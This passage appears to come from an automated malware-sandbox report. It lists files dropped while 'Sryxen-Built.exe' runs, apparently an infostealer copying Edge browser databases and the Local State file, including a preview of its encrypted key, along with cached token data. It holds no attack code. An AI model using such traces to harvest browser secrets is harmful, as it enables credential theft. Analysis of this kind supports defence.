                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2278
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.837850817602803
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKxrgxKxl9Il8uA/P6XoWN1Gg2rUkn7b4Eed1rc:mTYU6XD1Krnn7bp
                                                                                                                                                                                                                                                                                                MD5:35134CDA9FBECD3DFB49B624B2111E55
                                                                                                                                                                                                                                                                                                SHA1:19A91A8FF7907329678E89997E48D2356B6623FF
                                                                                                                                                                                                                                                                                                SHA-256:AE221CFB459122F9AFD7E9787BC0DBAB6897CE464D2D6A988E4E9E63A87C5264
                                                                                                                                                                                                                                                                                                SHA-512:E3DA934D226EBA84CCF42F78BAB1B9BEC5388A15E0E2E418DCB4EACD0B3F392A24A678E50C6BC9041BB2DE7FF9D5337A83AE1218E86C6147265524BAB1B2202B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.A.J.C.S.4.y.Q.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.K.D.V.q.H.P.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4622
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.003444144088397
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:+YUIs0qLcrAOf0xqyu/ndEoWc1q2xcgR/K:+DuPrAFxqtIWzGC/K
                                                                                                                                                                                                                                                                                                MD5:553BC560D68E31C67E60A9AAF2A34034
                                                                                                                                                                                                                                                                                                SHA1:080DEE2E0E95C39A454D4B0B33DAF266E4F05B22
                                                                                                                                                                                                                                                                                                SHA-256:89033974AB32595E10D8BD605D0F371BD6042499421BDDE7CB80ECBD8721B055
                                                                                                                                                                                                                                                                                                SHA-512:262825FD35F2ACB5300C069CE10F93F9ADDF184581274FDA25A83DC36F18F11D20E744A875BCC11C9793D5800FFC48DB441047534C1E0A652524707FDC95E11B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".t.M.C.n.M.I.S.Q.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.K.D.V.q.H.P.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2684
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.90716114718656
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:uiTrlKx68Wa7xQBxl9Il8uA/PLzon8+mqW4YB9COP1NVsmzl1WUFd/vc:auYULzTwuB9ZNCmz3Nk
                                                                                                                                                                                                                                                                                                MD5:4B696E628D0D8E851FF112EC6DF9999A
                                                                                                                                                                                                                                                                                                SHA1:2AAED32E6830A37E2F682FE5A6CBA7800A082029
                                                                                                                                                                                                                                                                                                SHA-256:2E90C96B4AAC5DB5B42A770E30AB0CC7855E21FCEF4672B9691F9CD99D56B1AA
                                                                                                                                                                                                                                                                                                SHA-512:75040C004A73D473EF7A74E1F1EBE11EBBB5BBED42206E030D8F258648BA1A76814EBDFAFE3F5CA058F6715685719BE3086BE3913592D8D4BEA059E12F79F718
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".D.C.N.l.X.1.W.v.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.K.D.V.q.H.P.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1504
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.276700844521632
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:3xSKco4KmZjKbm51s4RPT6moUe7u1o+m9qr9t7J0gt/NKmNUNEr8H0tecJ:hSU4xymI4RfoUeCa+m9qr9tK8NfUNEpX
                                                                                                                                                                                                                                                                                                MD5:C948596F94A461D94B6FA5E05512F9B7
                                                                                                                                                                                                                                                                                                SHA1:ECE14ED6A40966EDA9F8293C9E7D86E681A35B2C
                                                                                                                                                                                                                                                                                                SHA-256:C6BF034B84DBAE281B2FE390D07FB51B61E6170DB95F04F0A7A3847D37C899C5
                                                                                                                                                                                                                                                                                                SHA-512:E20CE29C8B2AD5349C5922859D38A71F71A18C7E5F3870639AE671F7C91A9D7498179362DE18A06F4DCB3125B85727924EE40296081A7DA32F75C89E69EFBE5B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:@...e...........4....................................@..........@...............|.jdY\.H.s9.!..|4.......System.IO.Compression...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1522e357-e69a-4298-b30e-55c103916e1f.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):154545
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.839678617100523
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:zZH5WPD5SqCJryow8AWTtwGrasOQNHjWRKnvXTwL:zpIPFCXjAWTtwGusOWmMvjwL
                                                                                                                                                                                                                                                                                                MD5:EAE462C55EBA847A1A8B58E58976B253
                                                                                                                                                                                                                                                                                                SHA1:4D7C9D59D6AE64EB852BD60B48C161125C820673
                                                                                                                                                                                                                                                                                                SHA-256:EBCDA644BCFBD0C9300227BAFDE696E8923DDB004B4EE619D7873E8A12EAE2AD
                                                                                                                                                                                                                                                                                                SHA-512:494481A98AB6C83B16B4E8D287D85BA66499501545DA45458ACC395DA89955971CF2A14E83C2DA041C79C580714B92B9409AA14017A16D0B80A7FF3D91BAD2A3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...................h...|..=.Ih.\...T.....}..u0...HVND......R....~D.H$9w._2.3.2...5.H.V.@....k;..c.V.7s....9o`_3qP{}....*.G....5.:.m..]..:.w|'..lG.../..,...G....g...O..}....K.Hk......T>..F7G.!n..h.j...J...XzbG..*..kK]!z..;.K.U.......1:..7w.....6...N.I!....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!...j9%2/.....(-.C.....].=....I.a..!......k..,i.....T.m.xM.W4.)`0..6R".%............m..8.....|.#......`..L0~..F-....B%.Bh.......H....R..~...Z....7Q...y....?.....[......t........J.R^....o....?.%....3h...8.....e..0.v..33.Si...._....3.d.S...Y....b.....O.s$......~...)l..g._.);.S.......yn@.....3iG.).I76.]..].t_..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\1oGircD.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\2H0RCzV.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):6648
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.800021953495727
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:iaYufr62qpTM5ih/cI9URXl8RotowZFVvluhKe4dUONIeTC6XQS0qGqk+Z4uj+rJ:Io+The2RUUhq6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                                                                                                                                                                MD5:B5440303816904159A847A030029C52D
                                                                                                                                                                                                                                                                                                SHA1:6B7AAA98473C5B1F88AF1FAF7D864D185164912F
                                                                                                                                                                                                                                                                                                SHA-256:B507FF2DB7CA2ACDA8A1075D92A460F4C2995D30C8C9FAC9484D8458737C04A3
                                                                                                                                                                                                                                                                                                SHA-512:6E626A44F5357498C4A467E52EE59CC7E0B89A22D8A714534AF42982B44854602A35F18235F5686E27717F8557081820FC33C2658B5EAA79E9657C0E2F1554D3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADscBs/HS2TTJocp6NtpoyLEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAsW8ultSdDwTk/AwAAbf7bEI2/b0XfFbP3jjJ+raY3fcAAAAADoAAAAACAAAgAAAAsg3hXdbXl6JIj8KFvhbWlaqVSpM3ag+0g0nExYB2Z1kwAAAAXs7yCB0jG0dlOoc3vEVs9i7od11B2WMH/KUhpHcou9G

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\7fa023b6-db08-49b6-bd32-aa2df3dd6ec9.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):206855
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                                MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                                SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                                SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                                SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\98c38c64-a14c-4801-9958-279e0d5af521.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\CimdN7b.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\CimdN7b.db-shm

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\Df0Trpc.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):114688
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\NI5B49f.db

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Sryxen-Built.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
